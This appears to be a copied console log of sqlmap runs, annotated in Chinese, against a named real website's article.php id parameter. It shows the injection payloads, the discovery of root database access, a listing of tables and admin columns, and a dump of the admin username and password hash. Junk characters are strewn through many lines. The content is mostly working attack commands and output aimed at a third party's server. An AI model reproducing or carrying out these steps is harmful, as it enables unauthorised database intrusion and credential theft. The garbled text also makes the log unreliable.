D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ j9 H' ?) H7 q# f9 O
ms "Mysql" --current-user /* 注解:获取当前用户名称
5 p: e2 K% Q S" i" W7 g sqlmap/0.9 - automatic SQL injection and database takeover tool; D( U" \ z. O" J. a
http://sqlmap.sourceforge.net starting at: 16:53:54
; ~% j# n1 G' G* E[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
# h% E( }; H4 c$ r! a, \+ d" B session file
0 K- P$ A5 ~2 Y* R- o2 I[16:53:54] [INFO] resuming injection data from session file, d: {3 @- C. F3 d) v( f. t6 O
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file |" [8 S3 X1 M1 `3 C I# h
[16:53:54] [INFO] testing connection to the target url
5 @ g# O7 Q) m- b: v1 U8 gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
, a \: [2 B& x) J2 @) P' D& \7 Wsts:6 c. J9 v" b* ^8 z
---
# S W9 ^# i( X. bPlace: GET
; l( l L: a/ a, H# ~$ xParameter: id
. m. N. T: n3 `/ Z/ E Type: boolean-based blind
1 {. c+ ^( x Y Title: AND boolean-based blind - WHERE or HAVING clause
) S3 i( e+ j$ ]! x+ }+ p+ b! ]9 Y Payload: id=276 AND 799=799, v& B4 W! `5 x9 f8 D. r* E
Type: error-based+ k# Q, T4 \ }% a
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 u5 K+ f% l5 G' @; c& G' {5 f5 b% ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& p! ^( f: `8 b9 U- a) _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: k7 t' w$ S7 ?! E% u y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); s% x7 l7 J( N1 }* T2 {
Type: UNION query7 D1 j2 Q: t4 y# t0 o& A; `
Title: MySQL UNION query (NULL) - 1 to 10 columns3 I/ n' T# d/ y7 u
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 j* t( o5 G$ J2 q( Y4 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 @4 B+ ^7 H% U/ X/ LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: U6 R2 m( |* Z+ F2 n+ ]+ C Type: AND/OR time-based blind$ W6 B% _. Q3 E4 i; t$ m- Q
Title: MySQL > 5.0.11 AND time-based blind4 L1 h$ F( x& t4 y3 q) Z
Payload: id=276 AND SLEEP(5)8 Y% ^9 D! U. i+ ]
---6 Q f* Y% t; ^: f4 W+ L: z
[16:53:55] [INFO] the back-end DBMS is MySQL
* l( C, Z0 x2 n& R0 H4 j5 ]web server operating system: Windows
( p$ }+ E9 B! K8 s. ^; C* Z9 iweb application technology: Apache 2.2.11, PHP 5.3.0
1 f, i* { h) C+ E" o" u8 Kback-end DBMS: MySQL 5.00 j7 b* H1 _/ w
[16:53:55] [INFO] fetching current user6 J; p8 V; P: J* q
current user: 'root@localhost' ) Y8 N2 u9 A! M
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; s# {2 J2 n7 h3 e) e1 r
tput\www.wepost.com.hk' shutting down at: 16:53:58' Z' q! Q, d7 L6 @# P
9 A- L$ E7 e0 a+ W% _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# R* F$ N, B$ Q" ]7 ^8 |' P& M Rms "Mysql" --current-db /*当前数据库
5 ^: u; I& A' ~; p sqlmap/0.9 - automatic SQL injection and database takeover tool
4 n$ ]& N7 ~8 m http://sqlmap.sourceforge.net starting at: 16:54:16
+ ~2 } L! S k: { L X# y[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
6 I; g, U& Q4 V9 L session file
9 m: o4 k" E$ x8 v5 W[16:54:16] [INFO] resuming injection data from session file
' f0 S5 K* b9 q+ W8 t; s[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 U9 ?4 |) i- H2 k
[16:54:16] [INFO] testing connection to the target url
5 i) }3 G' o1 r- y6 m. F- Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque8 W$ l4 @# ~7 n& J8 z- C
sts:
e2 F; ?$ R" N, P( q---/ W( F& ^0 n+ |( t* u! i
Place: GET
/ D; `. l; c8 \. g. h% RParameter: id* @7 a2 K6 v0 L: a5 E- j
Type: boolean-based blind
" f4 w$ \7 \/ @ Title: AND boolean-based blind - WHERE or HAVING clause3 T2 x |+ S5 {' g8 R- R8 ~
Payload: id=276 AND 799=7999 H r6 q4 w) q: B8 f5 e
Type: error-based
# b3 Y; w q9 t) S: ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
b) v. H& E5 M# J& P4 ]4 \ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
D8 @' M& F% \( O: z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ T. d- Z/ j/ ]/ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; {9 _- C0 _" h1 i# B Type: UNION query
- C0 k- a! N$ P Title: MySQL UNION query (NULL) - 1 to 10 columns7 |/ W& s1 W \$ b4 H, @! ?
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' M4 {- S% z# X+ u4 k# v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 U, `. v6 c; Y2 `) ?. q; x+ A L, \: o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% T& o* q' e0 C5 J* x: R) j Type: AND/OR time-based blind
8 n# x9 A9 J3 n# x+ J0 Z# z Title: MySQL > 5.0.11 AND time-based blind( s! Q# D/ T# D% H: }
Payload: id=276 AND SLEEP(5)
/ i9 |: k* \5 H+ [4 l, o, y! x0 F---
2 O5 q+ U) b9 _. M% u[16:54:17] [INFO] the back-end DBMS is MySQL( a5 l) o3 Y6 o' Y# {' S8 `
web server operating system: Windows, ]0 o/ u; w/ E( q
web application technology: Apache 2.2.11, PHP 5.3.0
* r7 }/ {4 H+ Wback-end DBMS: MySQL 5.0/ H, G- X" }& y" N
[16:54:17] [INFO] fetching current database9 l0 O1 i: P/ [9 F/ T4 W
current database: 'wepost'
, r& I) [) N! c. ?* c: |[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
# _1 L( x/ N" C8 htput\www.wepost.com.hk' shutting down at: 16:54:18
$ x+ ^1 \* P! |( AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# ?) `( @: `& q" Ams "Mysql" --tables -D "wepost" /*获取当前数据库的表名/ U1 u5 V8 K% B5 s
sqlmap/0.9 - automatic SQL injection and database takeover tool/ V8 \- }6 z- ?3 `
http://sqlmap.sourceforge.net starting at: 16:55:25
+ K0 t! J- ]% j' f. G' x4 O[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) O; f0 m$ h+ l. }; t) K* L ]
session file
' f2 ?, x* F( A9 g, x* a2 j[16:55:25] [INFO] resuming injection data from session file
! ^' O* Z' H( H" t6 i[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! g6 U. T: g0 R, z, j3 z[16:55:25] [INFO] testing connection to the target url+ |1 L: k b! `1 L* C
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 n0 ^9 ?2 h, D d' n: ests:5 c3 V" F# p4 e& @8 z
---" s8 E- [3 }6 A+ E
Place: GET, ]- {5 p4 ?, O/ v( d9 w" c
Parameter: id- z/ ?! c# E8 D; d- g: L3 i$ ^
Type: boolean-based blind! U' d1 D0 r& P1 G& {' @
Title: AND boolean-based blind - WHERE or HAVING clause* o% b" C: O9 Z2 h' V0 ]
Payload: id=276 AND 799=799+ `/ z6 V4 y/ V4 D! H6 m5 }
Type: error-based
2 _2 W @' m C2 o Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& F$ [: |" `& Z- ]( ?* X; D Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 X, g. e2 h2 w2 U& ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; q' v. ~- W0 D6 ^+ O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 m2 @1 w0 G" I9 q) y
Type: UNION query: }8 |6 @' M! l
Title: MySQL UNION query (NULL) - 1 to 10 columns2 m ?+ m' c1 v0 _' [" I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ Q; a9 z& ^- y' q/ b
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; s! n# _0 G3 K" _, {
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 r8 Q3 V& ^/ C9 U( i7 Z& I4 L( L
Type: AND/OR time-based blind
8 {; V1 J( S% T2 o7 S( w8 G) ~4 _ Title: MySQL > 5.0.11 AND time-based blind# @* W3 O$ X4 s+ R
Payload: id=276 AND SLEEP(5)/ @" V. j0 t3 s9 K
---
0 u( d1 G Z/ {3 r: Y! a[16:55:26] [INFO] the back-end DBMS is MySQL# w% v! O8 m. H$ E
web server operating system: Windows3 j7 s, u, s9 t- N) y* o E
web application technology: Apache 2.2.11, PHP 5.3.09 N3 s$ [* j/ e6 G7 F9 _, U
back-end DBMS: MySQL 5.00 n! }2 C6 N8 ^$ ^
[16:55:26] [INFO] fetching tables for database 'wepost': h- @* N% \8 m% j [
[16:55:27] [INFO] the SQL query used returns 6 entries
, c* T9 p" b) }( X* @, g/ ~Database: wepost8 K# R. H% I6 R* T) ~$ F/ k
[6 tables]$ r6 _$ O/ N) ?
+-------------+' |- K3 j; |! L( H- F A
| admin |" P) b; @2 `! B1 ^6 s! p% j. ~
| article |
2 T J! V5 A7 w| contributor |8 J8 \' C! V5 A
| idea |& ?% S# r0 H/ T9 U1 {' }* o
| image |/ P2 f, X9 H8 B. T
| issue |
6 N, |3 n: }. t) W+-------------+
9 A+ [7 ~: y6 D" e5 j6 f+ }( c( {[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* Q8 o) ~& u8 y. Y; j
tput\www.wepost.com.hk' shutting down at: 16:55:33# d" ^/ k/ m) i0 p1 F* g" ?1 x
2 X/ D; ` l: l& y- ^
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 b1 U) d8 ^. kms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
- x% i" T2 w6 v1 V, | sqlmap/0.9 - automatic SQL injection and database takeover tool! H7 h/ s, y5 X" y3 v2 h; D, P
http://sqlmap.sourceforge.net starting at: 16:56:06
1 ?: M% v5 q* {0 W c+ b) F9 Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
& L: N- V4 `8 Ssts:
5 X" U9 M3 x1 S2 r% ]+ ~4 K---
0 O* R. K8 }3 k" S' v5 M" PPlace: GET* K$ _3 i* W) [7 Q7 S- ^! t0 q
Parameter: id
$ I$ J7 n$ J% J6 b6 Z7 J Type: boolean-based blind
/ v2 s- n- ^& D Title: AND boolean-based blind - WHERE or HAVING clause0 T6 F- n+ B1 r; t1 A: i/ i
Payload: id=276 AND 799=799
% J! d1 r; ^ N Type: error-based2 q D% I8 P i4 R' p! C6 ^% }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 w0 Q5 _3 [1 r' H4 l: A3 w9 m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% f, i- Z7 H) a8 g: m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% T O3 r7 _/ Z2 }' g% v
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! o Z+ {# e. {, Z) f+ U6 ], K0 ^ Type: UNION query3 [6 t+ e: W% F& k
Title: MySQL UNION query (NULL) - 1 to 10 columns
' u9 e# u9 t- o) C! E6 t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 ^$ P$ h7 w& @: @% _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 a4 d0 _1 g( a( q: f' k( S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. E+ n5 r( b. m" `! S7 U8 H/ [ Type: AND/OR time-based blind8 c; x. a e2 d
Title: MySQL > 5.0.11 AND time-based blind3 d2 @7 `/ K. C- D4 a ~7 n
Payload: id=276 AND SLEEP(5)
O# ^5 U1 ]: G+ Y---/ _9 Y; E1 T$ t/ ?& W8 q( g% c
web server operating system: Windows
* ]- b7 V6 f# _3 z! m: M6 Pweb application technology: Apache 2.2.11, PHP 5.3.0
# q) K% h' E5 J9 \4 s G. Eback-end DBMS: MySQL 5.0
; E* ?6 f& s9 G3 Y7 O0 P" j6 w" d[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se% K* z* ]3 h! \! u$ e$ r5 k
ssion': wepost, wepost. n% o' X0 r2 z' M Y: y7 ^7 M
Database: wepost# P9 l+ v# Y* M' E1 _) ]: P, u
Table: admin
8 b! ]* X6 `% F8 @7 w0 D[4 columns]
4 `, ]. j5 ^' |0 F+----------+-------------+9 ?0 P3 `5 ^3 p! {$ h: _
| Column | Type |
5 Y* |" Q, I: }% S4 p0 b+----------+-------------+
7 L( ?& Y! N$ H| id | int(11) |+ j6 ]& k" K6 u2 s
| password | varchar(32) |
2 j8 I7 N8 n3 A5 m& Y9 D' k| type | varchar(10) |$ m" B6 f( n9 o; X" O; u T
| userid | varchar(20) |
( Z; `" j, w5 k/ I3 o) W5 ?+----------+-------------+# V- m8 w1 t" ?4 t8 C
shutting down at: 16:56:19
( m5 i1 l0 h( O9 J( n/ j6 b
1 O$ Y# r m3 d/ }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 t8 O* }7 N& j6 b/ _/ H
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
8 q: S2 Z, l4 I1 C sqlmap/0.9 - automatic SQL injection and database takeover tool: r9 D5 y/ Q0 T! M. `% d
http://sqlmap.sourceforge.net starting at: 16:57:140 |$ o$ u0 `7 e4 ~
sqlmap identified the following injection points with a total of 0 HTTP(s) reque N! r$ d2 m* ^# [8 F7 O4 A3 I
sts:+ ] p/ n0 ?% |) j/ y
---% _3 i; b9 P$ n
Place: GET
9 K3 j6 s4 _* N5 z2 y5 I" _0 C# oParameter: id5 G4 d8 ^4 \+ O: D( R% @: t5 w
Type: boolean-based blind/ l3 o. u$ o& u
Title: AND boolean-based blind - WHERE or HAVING clause1 v4 s" A6 R+ q" D
Payload: id=276 AND 799=799
! V5 v0 R8 {, p/ R, F, t+ O Type: error-based
5 o" f' n- O2 D ?; F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: ?# X5 |( c- a9 h" X
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: W" X a$ V. I, G0 `- W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" n; W. O3 l* R t( M& ^4 i* ^
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 Q# m- z; }- m- H
Type: UNION query( Y2 H+ n* Z# k+ S2 z
Title: MySQL UNION query (NULL) - 1 to 10 columns
2 ~, t `. j# j4 @! T' h, { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ T7 C2 N& D, w& `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" ~& ]. g/ ]) qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 |$ @1 G1 g' t; u& S
Type: AND/OR time-based blind
" c4 o+ k9 o6 _' B" X) u7 I! f9 ^1 t Title: MySQL > 5.0.11 AND time-based blind
2 j4 E' T4 V# t9 [! s! `6 J0 I* O& S Payload: id=276 AND SLEEP(5)2 F% ?: ?3 n& M' j" }: H
---9 B- ^& x( X( Q$ ~1 T
web server operating system: Windows# T1 s0 z/ h$ {- x; |0 C. {
web application technology: Apache 2.2.11, PHP 5.3.00 w. x7 t4 G# R% M4 ?+ a
back-end DBMS: MySQL 5.04 M, T4 \6 _2 G' f3 y% f
recognized possible password hash values. do you want to use dictionary attack o1 j& o0 w0 ^0 j
n retrieved table items? [Y/n/q] y- T7 N# v8 ?' B4 M5 }9 P
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]# q* B" _) u$ @% q
do you want to use common password suffixes? (slow!) [y/N] y Y% K$ N( v" m* I1 z. v0 d Q
Database: wepost
- P' U9 T8 j: y% @Table: admin: L$ y- U7 S! p3 ?! L# R
[1 entry]
- z- G* X- A# F+----------------------------------+------------+
- ?" V+ z) U! |( v* A| password | userid |
2 c Y4 K- y* Y+ Y+----------------------------------+------------+$ W- u: g9 j0 k( u2 }& U; H9 w
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 B+ L5 z2 Q2 m8 S+ J6 w& H
+----------------------------------+------------+ P$ E" s8 K: B; B6 x6 }; o* A
shutting down at: 16:58:14
" }+ c/ B. r( }/ _4 _. K
8 l* y% k, }$ j' s3 u, D: O3 cD:\Python27\sqlmap> |